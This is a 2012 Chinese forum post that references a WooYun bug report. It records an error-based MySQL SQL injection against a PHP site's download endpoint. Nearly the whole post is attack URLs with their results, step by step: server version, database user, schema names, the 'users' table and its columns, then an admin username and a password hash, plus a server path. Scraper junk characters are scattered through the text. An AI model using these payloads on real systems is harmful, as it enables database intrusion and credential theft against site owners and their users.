找回密码
 立即注册
查看: 2643|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666. a1 E' `0 n3 A5 e( t

* E1 k% P# {4 Q5 k之前想找个测试 没想到这有 可以测试下做个记录而已
0 i3 P! ~$ Y1 u3 U7 Z
+ I7 p# i7 g9 a. }5 h! x3 w+ Nhttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003; s5 M1 }+ U) o7 i- R% h
; j3 Q* D8 D- m5 x( z
/data0/htdocs/leqi_new/app/myapp.php( a$ @) [( f7 g# V% ?
3 d$ c. n2 ?2 f, d5 `
或者
0 B9 J3 c6 Z- u  w/ d
$ [0 B$ \* ]) S4 r  j" f: g/**********version()**********/ 5.1.49-log
1 [% j: r5 I; @& P3 Q( phttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003" U: N2 M% W8 \2 m% ?
+ z' X) T9 Q0 ^
/**********user()**********/  
* y: P$ P* L* }/ H$ Q' e6 z- o8 J/ thttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003% v" l! P' l9 W

0 g8 a$ ]2 P* [! e! b  t/**********database()**********/  leqi
+ C9 g6 W% r" Rhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0030 M. G5 j4 B) I5 ~' S
2 p! a: U# K9 `
/**********limit依次递归爆库**********/% Z' `4 o2 d( F5 U
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003* s: w% i1 I1 @0 Z( T3 U8 m
information_schema
; u! f/ u% }: Y; b- ^' a) d8 bhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0030 {4 w, l, a8 Z' K6 u2 K
leqi
  x" e% a5 m* z3 chttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
  n7 {4 r9 s$ q, u/ [- @test* @( L) M9 }* E9 R
& k- ]; l5 a+ P  t$ ^
/**********limit依次递归爆表名**********/
9 I( F9 Y* j, r0 b5 Ihttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003; n, a5 R7 |, ?  s0 z6 A* e1 v9 |
users8 W8 h0 l6 `7 N9 K" Q# E: k7 @
0 E8 X2 ^7 E+ _5 S0 j
/**********limit依次递归爆字段名**********/
' S# S8 T4 V; o. P. v3 ?5 Shttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
: b  C' q+ h# Nuser_id,username,nickname,passwd,group_id
# e# L: z0 ~9 l. ihttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
; M6 g# |/ \! F7 \) ?& R/wapc/5000_0005_003
! b+ d& B) s. ^11 21! P' o2 z$ |" w; U# E2 {
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/ N0 Z* ^, i3 P& ]/wapc/5000_0005_003
: `# Y3 m( Z" W/ s: {- q11 341 351 361
8 w0 |6 G" O6 l, `- |1 ~) b/**********爆数据**********/
+ d. h" T$ E+ C& J" Ghttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23' M; p- v- C5 B# s3 E
admin
4 d0 t8 q1 T& E' n$ G9 s. ?http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%235 |+ V! O4 [! \, N* R
6a8b4574ca231eb8bd52764d4978ffcd- C$ a9 l! o; m( i
/ L1 u( a1 N3 ^2 f

! n: t: Z/ ]6 D, T' r
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表